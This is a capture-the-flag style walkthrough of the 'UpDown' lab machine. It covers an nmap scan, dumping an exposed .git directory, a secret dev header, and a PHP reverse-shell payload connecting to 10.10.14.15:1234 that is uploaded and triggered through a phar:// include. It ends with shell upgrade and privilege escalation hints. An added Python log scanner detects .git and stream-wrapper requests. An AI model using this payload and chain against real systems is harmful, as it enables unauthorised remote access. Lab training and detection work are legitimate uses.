
UpDown

Reconnaissance

IP: 10.10.11.177

NMAP

nmap -T4 -p- -A 10.10.11.177
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 06:14 UTC
Nmap scan report for 10.10.11.177
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT      ADDRESS
1   31.01 ms 10.10.14.1
2   31.09 ms 10.10.11.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.52 seconds

Website

Site

ffuf found /dev, but there is nothing more there. I also found the subdirectory http://siteisup.htb but cannot open it. Let’s dig deeper and scan again.

OK, we got .git.

Dump it for easier enumeration:

git-dumper http://siteisup.htb/dev/.git/ .

I found an interesting commit with a comment about a new technique to protect the dev vhost.

OK, from the git logs we know that we need to add the Special-Dev: only4dev header to connect to dev.siteisup.htb. Let’s try it.

Add the header with Modify Header Value: https://addons.mozilla.org/en-US/firefox/addon/modify-header-value/

<?php
$descriptorspec = [
    0 => ["pipe", "r"],  // STDIN
    1 => ["pipe", "w"],  // STDOUT
    2 => ["pipe", "w"],  // STDERR
];
$command = "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.15/1234 0>&1'";
$process = proc_open($command, $descriptorspec, $pipes);
if (is_resource($process)) {
    fclose($pipes[0]); // Close STDIN
    fclose($pipes[1]); // Close STDOUT
    fclose($pipes[2]); // Close STDERR
    proc_close($process);
}
?>

Save it as rev.php, then zip it as rev.abc, upload it, and navigate to:

http://dev.siteisup.htb/?page=phar://uploads/22fa9abfe9c50075a95d916ad666e595/rev.abc/rev
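On the defender's side, both the .git dump and the phar:// include above leave recognizable lines in the web server's access log. The following is an added example, not part of the original write-up: it scans access-log lines for requests into a .git directory and for PHP stream wrappers in query parameters. The Apache combined log format, the rule names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format (assumed): ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# PHP stream wrappers that should never appear in a user-supplied include parameter
WRAPPER_RE = re.compile(r'^(phar|php|zip|data|expect|file|glob)://', re.I)
# Any path segment named .git (e.g. /dev/.git/config)
GIT_RE = re.compile(r'(^|/)\.git(/|$)')

def classify(line):
    """Return a list of (rule, client_ip, status, detail) findings for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, _method, target, status = m.groups()
    parts = urlsplit(target)
    findings = []
    if GIT_RE.search(unquote(parts.path)):
        # A 200 means repository files were actually served, not just probed
        rule = "git-exposed" if status == "200" else "git-probe"
        findings.append((rule, ip, int(status), parts.path))
    # parse_qsl percent-decodes values, so encoded wrappers are caught too
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if WRAPPER_RE.match(value.strip()):
            findings.append(("stream-wrapper-param", ip, int(status), f"{key}={value}"))
    return findings

def scan(lines):
    """Collect findings across many log lines, preserving order."""
    return [f for line in lines for f in classify(line)]

# Constructed sample lines modelled on the requests in this walkthrough
SAMPLE = [
    '10.10.14.15 - - [02/Sep/2025:06:20:01 +0000] "GET /dev/.git/HEAD HTTP/1.1" 200 23 "-" "python-requests"',
    '10.10.14.15 - - [02/Sep/2025:06:20:02 +0000] "GET /dev/.git/nope HTTP/1.1" 404 196 "-" "python-requests"',
    '10.10.14.15 - - [02/Sep/2025:06:41:10 +0000] "GET /?page=phar://uploads/0000/rev.abc/rev HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.15 - - [02/Sep/2025:06:41:30 +0000] "GET /?page=%70har%3A%2F%2Fuploads/x/y HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [02/Sep/2025:06:42:00 +0000] "GET /?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```
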

We got a reverse shell. Upgrade to a TTY:

python3 -c 'import pty; pty.spawn("/bin/sh")' 

__import__('os').system('/bin/bash')

https://gtfobins.github.io/gtfobins/easy_install/